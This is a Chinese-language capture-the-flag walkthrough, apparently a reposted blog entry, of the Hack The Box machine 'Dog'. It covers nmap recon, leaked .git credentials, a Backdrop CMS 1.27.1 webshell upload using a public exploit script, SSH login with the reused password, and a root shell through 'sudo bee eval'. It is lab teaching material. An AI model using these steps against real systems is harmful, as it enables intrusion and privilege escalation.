HTB靶机 - dog记录

admin 2025年3月17日09:52:47评论145 views字数 2170阅读7分14秒阅读模式

信息搜集

1、端口扫描

nmap -A -v -T4 10.10.11.58

PORT   STATE SERVICE VERSION22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: |   3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)|   256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)|_  256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))| http-robots.txt: 22 disallowed entries (15 shown)| /core/ /profiles/ /README.md /web.config /admin | /comment/reply /filter/tips /node/add /search /user/register |_/user/password /user/login /user/logout /?q=admin /?q=comment/reply|_http-generator: Backdrop CMS 1 (https://backdropcms.org)| http-methods: |_  Supported Methods: GET HEAD POST OPTIONS| http-git: |   10.10.11.58:80/.git/|     Git repository found!|     Repository description: Unnamed repository; edit this file 'description' to name the...|_    Last commit message: todo: customize url aliases.  reference:https://docs.backdro...|_http-favicon: Unknown favicon MD5: 3836E83A3E835A26D789DDA9E78C5510|_http-title: Home | Dog|_http-server-header: Apache/2.4.41 (Ubuntu)
80端口 -> .git泄露、robots.txt文件、Backdrop CMS
GitHack脱下来的git目录:settings.php$database = 'mysql://root:[email protected]/backdrop';$settings['hash_salt'] = 'aWFvPQNGZSz1DQ701dD4lC5v1hQW34NefHvyZUzlThQ';"update_emails": ["[email protected]"    ],define('BACKDROP_VERSION''1.27.1');
.git里面泄露的信息有一个密码,BackDrop的版本(1.27.1)还有用户tiffany

打点

登录框 --- .git泄露

[email protected] / BackDropJ2024DS2024

Backdrop 1.27.1

searchsploit backdrop 1.27.1searchsploit -m php/webapps/52021.py
HTB靶机 - dog记录
dog-00

运行POC - 手动复现 - 排错

python 52021.py http://dog.htb# 访问给的地址发现 -> 不存在 -> 那就手动去弄一下 http://dog.htb/admin/modules/install# 但是访问这个 http://dog.htb/admin/modules/install -> 依然不存在# 上传点 -> 手动寻找
HTB靶机 - dog记录
dog-01
找到上传点,发现实际情况下无法上传zip -> 只支持 tar tgz gz bz2将zip文件重新打包成以上中的格式
HTB靶机 - dog记录
dog-02
这里好像还有点说法 -> 直接用 tar -zvcf 命令生成最好tar -zcvf shell.tar.gz ./shellshell目录来源于 -> 运行POC生成的 -> shell.zip解压出来的

tar -zcvf shell.tar.gz ./shell

  • -z:使用gzip格式归档
  • -c:创建新的归档
  • -v:显示归档过程
  • -f:指定归档文件名
HTB靶机 - dog记录
dog-03

Getshell

webshell & ssh

寻找用户 -> 尝试ssh登录johncusack:BackDropJ2024DS2024
HTB靶机 - dog记录
dog-04
得到user.txt

提权

sudo -l
HTB靶机 - dog记录
dog-05
根据bee的帮助文档sudo bee --root=/var/www/html eval'system("/bin/sh")'
HTB靶机 - dog记录
dog-06

总结

.git泄露robots.txt文件泄露敏感信息 -> 账号密码 -> CMS版本 -> 因为是CMS & 泄露账号密码 -> 登录后台 -> 寻找CMS漏洞 -> 得到POC -> 复现RCE -> 得到shell -> sudo提权

原文始发于微信公众号(夜风Sec):HTB靶机 - dog记录

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月17日09:52:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HTB靶机 - dog记录https://cn-sec.com/archives/3847521.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息